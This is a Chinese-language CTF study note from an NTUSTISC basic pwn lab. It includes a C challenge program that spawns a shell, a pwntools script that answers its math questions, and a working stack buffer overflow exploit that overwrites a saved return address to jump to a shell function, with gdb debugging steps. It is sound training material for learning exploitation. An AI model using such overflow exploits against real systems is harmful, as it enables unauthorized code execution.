NTUSTISC - Pwn Basic 1 [2019.03.12]学习记录


pwntools的一些函数
1.jpg

objdump
2.jpg

readelf
3.jpg

binary format
4.jpg

x64 calling convention(64位下调用规则)
5.jpg

lab0

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <unistd.h>

/*
 * SIGALRM handler: report the timeout and terminate immediately.
 *
 * _exit() is used rather than exit() so no atexit handlers or stdio
 * flushing run from signal context.
 */
void handler(int signum){
    (void)signum;  /* only SIGALRM is routed here; the number is not needed */
    fputs("Timeout\n", stdout);
    _exit(1);
}

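/*
 * Challenge entry point (lab0).
 *
 * Flow: make stdio unbuffered, arm a 90-second alarm, require a fixed
 * 4-byte magic value, then ask 1000 random arithmetic questions.  Any
 * wrong or unparsable answer exits; surviving all of them runs a shell.
 *
 * Changes from the original listing: setvbuf uses the named _IONBF
 * constant instead of the bare 2, the read() of the magic value is
 * length-checked, a failed scanf() no longer leaves `ans` uninitialized,
 * and the product a*b is computed in 64 bits so it cannot overflow int.
 */
int main(void)
{
    /* Unbuffered stdio so prompts reach the peer immediately. */
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IONBF, 0);
    signal(SIGALRM, handler);
    alarm(90);

    unsigned seed = (unsigned)time(NULL);
    srand(seed);

    unsigned int magic = 0;
    printf("Give me the magic number :)\n");
    /* Require exactly 4 raw bytes; a short read would leave magic partly unset. */
    if (read(0, &magic, sizeof magic) != (ssize_t)sizeof magic) {
        printf("Bye~\n");
        exit(0);
    }
    if (magic != 3735928559u) {  /* 3735928559 == 0xDEADBEEF */
        printf("Bye~\n");
        exit(0);
    }

    printf("Complete 1000 math questions in 90 seconds!!!\n");
    for (int i = 0; i < 1000; ++i) {
        int a = random() % 65535;
        int b = random() % 65535;
        int c = random() % 3;
        long long expected;
        char op;

        /* Pick the operation; the prompt text is identical to the original three cases. */
        switch (c) {
        case 0:
            op = '+';
            expected = (long long)a + b;
            break;
        case 1:
            op = '-';
            expected = (long long)a - b;
            break;
        default:
            op = '*';
            /* Up to 65534*65534 exceeds INT_MAX; widen before multiplying. */
            expected = (long long)a * b;
            break;
        }
        printf("%d %c %d = ?", a, op, b);

        long long ans = 0;
        /* A non-numeric reply counts as a wrong answer instead of reading garbage. */
        if (scanf("%lld", &ans) != 1 || ans != expected) {
            printf("Bye Bye~\n");
            exit(0);
        }
    }
    printf("Good job!\n");
    system("sh");  /* the reward for finishing the challenge */

    return 0;
}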

过一次验证,然后回答1000个问题就可以了

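from pwn import *

# Operators the challenge can emit; these are the three switch cases in the
# C source above.  Any other operator fails the dict lookup (KeyError).
_OPS = {
    "+": lambda x, y: x + y,
    "-": lambda x, y: x - y,
    "*": lambda x, y: x * y,
}


def _solve(question):
    """Return the integer answer to one prompt of the form "<a> <op> <b> = ?".

    The operands and operator are parsed explicitly rather than handed to
    eval(): the text comes from the running process, and eval() would
    execute whatever that process sends back.  Accepts str or bytes, since
    the pwntools return type differs between Python 2 and 3.

    Raises ValueError on a malformed prompt and KeyError on an unknown
    operator, aborting the script instead of sending a garbage answer.
    """
    # On Python 2, bytes is str, so this branch only runs on Python 3.
    if isinstance(question, bytes) and not isinstance(question, str):
        question = question.decode()
    lhs, op, rhs = question.replace(" = ?", "").split()
    return _OPS[op](int(lhs), int(rhs))


p = process("./pwntools")
p.recvuntil("number :)\n")
p.sendline(p32(3735928559))  # 0xDEADBEEF, the 4-byte magic value main() compares against
p.recvuntil("seconds!!!\n")
for _ in range(1000):
    question = p.recvuntil(" = ?")
    print(question)
    p.sendline(str(_solve(question)))
p.interactive()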

lab1

源码中buf只有16字节大小,但read读入了0x30字节,可造成栈溢出
7-1.jpg

找到shell函数的地址
7-2.jpg

buf是16字节,下面保存的rbp(栈底)占8字节。16+8=0x18
7-3.jpg

脚本就写出来了

from pwn import *

# lab1: the 16-byte stack buffer is overrun by a 0x30-byte read() (see above).
r = process("./bof")
# Block until Enter is pressed so a debugger can be attached to the child first.
raw_input()

# Address of the shell function, taken from the disassembly (7-2.jpg).
shell_addr = 0x400607
# 16 bytes of buf plus the 8-byte saved rbp sit before the saved return address.
filler = "a" * 0x18
payload = "".join([filler, p64(shell_addr)])

# sendafter() waits for the prompt, then writes the payload in one send().
r.sendafter(";)\n", payload)

r.interactive()

at调试之法

python脚本跑起来之后
gdb ./bof
at pid

8-1.jpg

ret出call
8-2.jpg

来到了函数地方
8-3.jpg

参数都传给寄存器了,就开始调用了
8-4.jpg